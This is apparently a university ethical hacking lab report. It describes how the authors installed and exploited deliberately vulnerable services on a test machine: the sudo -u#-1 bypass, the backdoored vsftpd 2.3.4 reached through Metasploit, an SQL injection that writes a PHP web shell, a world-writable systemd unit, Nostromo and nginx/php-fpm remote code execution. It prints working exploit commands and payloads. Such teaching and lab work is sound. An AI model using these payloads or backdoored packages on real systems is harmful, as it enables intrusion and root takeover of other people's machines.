Ethical Hacking

Alesci Gabriele, Mobilia Alessio, Tripoli Andrea 30/05/2020

SUDO Vulnerability

What is it and what is it for? Sudo, in computer science, is a program for Unix operating sys- tems that, within particular constraints, allows you to run other programs assuming the identity of other users. Some systems like macOS and install SUDO natively, while in others (for examaple, Debian) it should be eventually installed later. The constraints within which SUDO runs programs are expressed in the /etc/sudoers con- figuration file, which is normally only editable by the root user: it defines the users who can execute commands via SUDO, the identities they can assume and the commands that they can perform with any constraints on the parameters, with or without an authentication request.

Listing 1: Sample /etc/sudoers. 1 # This file MUST be edited vith the ’visudo’ command as root 2 3 Defaults env_root 4 Default mail_badpass 5 Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin←- :/sbin:/bin:/snap/bin" 6 7 # User privilege specification 8 root ALL=(ALL:ALL) ALL 9 10 # Members of the admin group may gain root privileges 11 %admin ALL=(ALL) ALL 12 13 # Allow members of group sudo in execute any command 14 %sudo ALL=(ALL:ALL) ALL 15 16 #includedir/etc/sudoers.d

How safe is it to use SUDO? From a security point of view, however, it is necessary to keep in mind that, although it is possible to limit the commands and the related parameters, SUDO does not carry out any checks on the integrity of the executable files that it is going to start. It is therefore important to make sure that they may not be altered or replaced by non-privileged users, and in particular by those who run them via sudo: otherwise, the non-privileged user could

Ethical Hacking Page 1 alter these files in order to execute arbitrary code, and then execute them with the privileges granted via SUDO, effectively creating a security hole. This can be prevented, for example, through the permission mechanism of the .

What is the syntax for using SUDO? The general syntax of SUDO is as follows:

sudo [options] [variable1=value1 ...] [--] [command [arg1 ...]]

The optional command parameter indicates the command to be executed, and the arg parame- ters are its parameters. The double dash - (optional) indicates that subsequent parameters are not to be considered options or variable assignments. Among the main options are:

• -u user It assumes the user identity instead of the root one.

• -l Lists the commands that the current user can execute via SUDO.

• -s Starts the default shell for the user whose identity is assumed.

You can also access the shell as a root user by typing:

sudo su

What is the vulnerability that has been inserted and what is it for? The vulnerability that has been entered into our system is better known as CVE-2019-14287 and mentions

In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.

This allows us to obtain root privileges with a user inserted in the /etc/sudoers file and typing a sequence of symbols (with Sudo versions < 1.8.28).

How was it installed? To install the SUDO version 1.8.21p2, you must first authenticate as root and uninstall the current version.

su - apt-get remove sudo

Then you need to download the correct version of the file from the official website sudo.ws and extract it.

Ethical Hacking Page 2 wget https://www.sudo.ws/dist/sudo-1.8.21p2.tar.gz

Now let’s move on to installing sudo.

cd sudo-1.7.21p2 ./configure make make check chekinstall dpkg -i name-of-package

For testing, check the current version that has been installed.

sudo --version

Now we need to add the user who could exploit the vulnerability.

useradd -m -s /bin/bas user passwd user

Now you need to go to edit the /etc/sudoers file using the default visudo command (with root) and insert the permissions that the user user can obtain.

visudo

Defaults env_root Default mail_badpass Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin: /usr/bin:/sbin:/bin:/snap/bin"

# User privilege specification root ALL=(ALL:ALL) ALL user ALL=(ALL: !root) ALL

# Members of the admin group may gain root privileges %admin ALL=(ALL) ALL

# Allow members of group sudo in execute any command %sudo ALL=(ALL:ALL) ALL

#includedir /etc/sudoers.d

In this way we allow the user user to obtain the privileges for each operation, despite not being root.

How do you perform the exploit? The vulnerability is simple to exploit, by inserting the fol- lowing -u#-1 before the operator, you will get root privileges, as you can see in Figure 1.

Ethical Hacking Page 3 Figure 1: Sudo exploit vsftpd Vulnerability

What is it and what is it for? vsftpd, (or very secure FTP daemon), is an FTP server for Unix-like systems, including . It is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, and RHEL Linux distributions. vsftpd enables the transfer of files from one computer to another. FTP is a way to transfer files to any computer in the world that is connected to the internet.

How safe is it to use vsftpd? vsftpd is currently safe, but in July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command shell on port 6200. This was not an issue of a security hole in vsftpd, instead, an unknown attacker had uploaded a different version of vsftpd which contained a backdoor. Since then, the site was moved to Google App Engine.

What is the vulnerability that has been inserted? The vulnerability inserted into the system, as previously mentioned, is vsftpd-2.3.4 to allow local access.

Why choose vsftpd? We opted to choose the use of the vsftpd vulnerability with respect to the 1.3.5 vulnerability (equally tested) since it was best incorporated into our system (regarding libraries and dependencies).

How was it installed? To install the vsftpd version 2.3.4, you must first authenticate as root and uninstall the current version (if it was installed). Then download the package with the back- door and start the configuration.

git clone https://github.com/nikdubois/vsftpd-2.3.4-infected mv vsftpd-2.3.4-infected vsftpd cd vsftpd

Before starting the configuration, edit the Makefile file as it had problems with the libraries.

nano Makefile

LIBS = ’./vsf_findlibs.sh’ -lcrypt

Ethical Hacking Page 4 Then you can start the configuration.

make

useradd nobody mkdir /usr/share/empty/ mkdir /var/ftp useradd -d /var/ftp ftp chown root.root /var/ftp chmod og-w /var/ftp

cd /usr/local/man mkdir man5 mkdir man8 cd /home/eth/vsfptd cp vsftpd /usr/local/sbin/vsftpd cp vsftpd.conf.5 /usr/local/man/man5 cp vsftpd.8 /usr/local/man/man8

make install

cp vsftpd.conf /etc

Now let’s edit the vsftpd /etc/vsftpd.conf configuration file.

Listing 2: Sample /etc/vsftpd.conf. 1 anonymous_enable=NO 2 local_enable=YES 3 write_enable=YES 4 dirmessage_enable=YES 5 xferlog_enable=YES 6 connect_from_port_20=YES 7 8 listen=YES

Then, insert the /bin/bash permission in the /etc/passwd file for the previously created. Now you can start the vsftpd daemon with the following command.

sudo /usr/local/sbin/vsftpd &

How do you perform the exploit? It is possible to exploit vsftpd using the metasploit tools:

search vsftpd

Ethical Hacking Page 5 use exploit/unix/ftp/vsftpd_234_backdoor set payload cmd/unix/interact set RHOSTS exploit

Local access has now been obtained and you will be able to perform operations to obtain more privileges (Figure 2.

Figure 2: Sudo exploit

Vulnerable Website

What is a Website and what is it for? The most common public accessible servers are web servers, so a Website that use a simple MySQL database to store news has been designed in php and javascript. It is named INPS news, winking at recent events, and it is shown in Figure 3.

Figure 3: Website

Ethical Hacking Page 6 The vulnerability is in the php code. The input value are neither checked nor sanitized and they are concatenated directly in the SQL query. There are different ways to use this vulnerabilities, like injecting code in the url or in the different inputs field in the sites. The sql injection permit to grab passwords from the user of the db and from the admin. But the most serious usage has the purpose to inject a php shell directly in the server and then browse it, in this way an user can obtain a shell and login as the user www-data. To permit this we have disabled some security feature. We have disabled the app armor of mysql. We granted to the root user of the db to write files and added www-data to the same group of mysql, so the Apache web server can read the files created by mysql user.

How do you perform the exploit? The vulnerability was tested in different ways. In this section is described a way to obtain the root shell. After testing how the site respond to different inputs you can understand how to inject the web shell. A possibilities is to inject it in the id field of the news in the url.

shell injection 1 http:///news-details.php?nid=12’ UNION SELECT 1,2,3,4,"",6,7,8 into outfile"/var/www/html/shell.php ←- "---

After that you can browse the shell and use it as the user www-data.

shell test 1 http:///shell.php?cmd=whoami

Figure 4: Shell result "whoami"

Ethical Hacking Page 7 Misconfigured service

What is a Systemd and what is it for? Systemd is a suite of basic building blocks for a Linux system. It provides a system and service manager that runs as PID 1 and starts the rest of the system. The main command used to introspect and control systemd is systemctl. Some of its uses are examining the system state and managing the system and services. With systemctl the system administrator can handle the services in an easy way. It is common to find custom scripts managed by systemd. A unit is a resource that systemd can operate and manage. Each unit has a configuration file known as unit file. The suffix of the unit file indicates for which type of unit the file is storing configuration information. Systemd unit files created, or customized, by the system administrator are located in the following directory: /etc/systemd/system/ In this case a service vulnerable.service start the execution of a simple script that send UDP packet in broadcast continuously.

vulnerable.service 1 [Unit] 2 Description=super secure service 3 4 [Service] 5 Type=simple 6 Restart=always 7 RestartSec=1 8 ExecStart=/usr/bin/bash /etc/script.sh 9 10 [Install] 11 WantedBy=multi-user.target

script.sh 1 for(( ; ; )) 2 do 3 echo"Sono un servizio mal configurato" > /dev/udp/255.255.255.0/3000 4 sleep 2 5 done

How do you perform the exploit? The vulnerability can be found in the bad management of permissions by the administrator. For example to allow other users or automated script to modify the service the admin could have given the command "chmod 777 vulnerable.service".

Ethical Hacking Page 8 In this way every user can modify the file and so the possibility to execute shell command as the root user. It is possible to modify the service file in a way to execute a custom script. It will run with the root privileges.

1 Nostromo 1.9.6

It’s not so absurd to have different webserver on the same machine. It’s possible to have different test environment and test performance on different webserver.

What is a Nostromo and what is it for? Nostromo (nhttpd) is a simple and fast HTTP server. It runs as a single process, and handles normal concurrent connections by selecting calls, but for efficiency, during more demanding connections such as directory listings and CGI execution, it forks. Public access is controlled using the word readable flags and CGI execution by the word executable flags of the file system permissions.

How do you perform the exploit? Directory Traversal in the function http_verify in Nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request. This is a known vulnerability and is exploitable running a python script present on exploit-db.com (Figure 5.

Figure 5: Nostromo Exploit

Ethical Hacking Page 9 2 Nginx 1.17 + Php 7.2.10 (Php-fpm bug)

What is a Nginnx and what is it for? Nginx is a very popular web server capable of dealing with high traffic, in this configuration it is powered by php-fpm to server php scripts. Php-fpm (fast process manager) is used to serve applications which require PHP framework, such as web forums or login gateways, while the web server returns HTML, JavaScript, and other non- PHP content. In our case Nginx will be listening on port 8081 and will simply server a page index.php. The vulnerability lies in the nginx.conf file, common configuration for nginx when dealing with php is having a location entry with a

fastcgi_split_path_info regexp ^(.+?\.php)(/.*)$;

When someone makes a request to nginx:

http://my.server/index.php/XXXXX

the XXXX part gets matched against the regexp and passed as PATH_INFO variable

config 1 server { 2 listen 80; 3 4 index index.php index.html index.htm 5 ... 6 location ~ [^/]\.php(/|$) { 7 8 fastcgi_split_path_info ^(.+?\.php)(/.*)$; 9 10 include fastcgi_params; 11 .... 12 fastcgi_param PATH_INFO $fastcgi_path_info; 13 } 14 }

The regular expression ^(.+?.php)(/.*)\$ doesn’t match \n and it will brake if encoded newline \%0a is added in the URI. Doing so, the PATH_INFO variable will be empty and the unpatched version assumes that env_path_info would always contain a value. The vulnera- bility is caused by the lack of validation, adding a try_file in the nginx configuration would avoid this exploit.

How do you perform the exploit? The attacker can send a specially crafted HTTP GET request with code to be injected ("\$_GET[a]‘?>") after the newline character \%0A.

Ethical Hacking Page 10 The URI should be around 2000 bytes so that the FPM module will write past allocated buffers into the space reserved for FCGI protocol data, opening the possibility for remote code execution. Once the bug is exploited a permanent web shell will be accessible by the parameter a, as shown in Figure 6, at the end of the URI (for example http://my.server/index.php/?a=ls /&).

Figure 6: fpm exploit

The exploit is also available as a Go on exploit db.

Ethical Hacking Page 11